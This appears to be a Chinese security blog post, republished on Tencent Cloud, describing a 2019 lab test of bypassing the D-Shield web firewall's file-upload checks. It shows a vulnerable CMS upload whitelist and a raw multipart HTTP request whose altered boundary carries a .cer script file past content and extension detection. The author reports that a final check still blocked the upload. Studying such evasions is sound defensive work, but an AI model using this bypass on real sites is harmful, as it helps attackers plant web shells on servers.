前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >D盾防火墙安全防护绕过-[文件上传]

D盾防火墙安全防护绕过-[文件上传]

作者头像
潇湘信安
发布2022-04-01 09:15:27
2.8K0
发布2022-04-01 09:15:27
举报
文章被收录于专栏:潇湘信安

0x01 前言

这个系列的绕过方式都是2019年测试的,当时测试版本为D盾v2.1.4.4,目前最新版本为D盾v2.1.6.2。安全防护的绕过方式都有时效性,所以以前测试的绕过方法可能大部分都已经失效了,但还是分享出来供大家参考下吧,有兴趣的可以自己去测试下最新版!

0x02 测试环境与基本信息

代码语言:javascript
复制
操作系统:Windows Server 2008 R2 x64
软件版本:D盾v2.1.4.4 [测试版]
进程名称:d_manage.exe[D盾服务程序]、D_Safe_Manage.exe[D盾管理程序]
服务名称:d_safe [D盾_服务程序(提供网站和服务器安全服务)]

用于测试的演示源码为南方数据V11,主要为Upload_Photo.asp、Config.asp这两个文件,上传限制代码如下,是基于白名单来进行限制的,程序代码允许上传cer,但D盾防火墙禁止上传cer。

代码语言:javascript
复制
<%@language=vbscript codepage=936 %>
<!--#include file="Inc/config.asp"-->
<!--#include file="Inc/upfile_class.asp"-->
<%
[...SNIP...]
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then  '检测上传文件扩展名
  EnableUpload=false
end if
if EnableUpload=false then
  msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
  FoundErr=true
end if
[...SNIP...]
%>
代码语言:javascript
复制
Const MaxFileSize=200         '上传文件大小限制
Const SaveUpFilesPath="UploadFiles"        '存放上传文件的目录
Const UpFileType="gif|jpg|bmp|png|swf|doc|rar|cer|asa"         '允许的上传文件类型
Const DelUpFiles="Yes"        '删除文章时是否同时删除文章中的上传文件
Const SessionTimeout=30       'Session会话的保持时间

0x03 防护绕过-[文件上传]

功能介绍:

D盾防火墙的上传文件防护功能主要用于检测:上传文件内容、上传扩展白名单、上传文件内容头、禁止脚本生成、文件内容长度限制等等。

代码语言:javascript
复制
禁止上传内容中存在代码! "filename":"bypass.jpg"
禁止上传此扩展的文件! "filename":"bypass.cer"
[禁][上传文件:bypass.jpg 内容不符][filename] 3C 25 0D 0A 44 69 6D 20 44 61 69 6D │<% Dim Daim
[禁止][上传模式禁脚本生成] C:\inetpub\wwwroot\nanfang\UploadFiles\20191243227714.cer
<!--#include file="888888888888888888888888888888888888888888888888888888888888888888888888.inc"-->
图片
图片

图2-4-1 D盾防火墙上传文件防护规则

图片
图片

图2-4-2 D盾检测上传文件内容和扩展名

解决方案:

利用Boundary来绕过D盾防火墙的上传文件防护功能,在HTTP数据包上传文件名的Boundary末尾处添加一个换行符,或者删除一个横杠即可绕过。

代码语言:javascript
复制
POST /nanfang/Upfile_Photo.asp HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.0.108/nanfang/upload_Photo.asp?PhotoUrlID=6
Content-Type: multipart/form-data; boundary=---------------------------491299511942
[...SNIP...]

-----------------------------491299511942

Content-Disposition: form-data; name="FileName"; filename="bypass.cer";
Content-Type: image/jpeg

<!--#include file="888888888888888888888888888888888888888888888888888888888888888888888888.inc"-->
[...SNIP...]
代码语言:javascript
复制
----------------------------491299511942
Content-Disposition: form-data; name="FileName"; filename="bypass.cer";
Content-Type: image/jpeg

<!--#include file="888888888888888888888888888888888888888888888888888888888888888888888888.inc"-->
[...SNIP...]
图片
图片

图2-4-3 Boundary边界换行符绕过上传

注意事项:

虽然已经通过换行符、删除横杠的方式绕过了D盾防火墙文件上传防护中的文件内容、扩展名、文件头的检测,但是最后“脚本生成”还是没能绕过,上传的文件还是被拦截了,不得不承认D哥的盾防火墙在IIS防护中做的还是很强的,脚本生成、一句话免疫、执行系统命令等几个防护都不是很好绕,也可能是我太菜了。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-02-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 潇湘信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
主机安全
主机安全(Cloud Workload Protection,CWP)基于腾讯安全积累的海量威胁数据,利用机器学习为用户提供资产管理、木马文件查杀、黑客入侵防御、漏洞风险预警及安全基线等安全防护服务,帮助企业构建服务器安全防护体系。现支持用户非腾讯云服务器统一进行安全防护,轻松共享腾讯云端安全情报,让私有数据中心拥有云上同等级别的安全体验。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档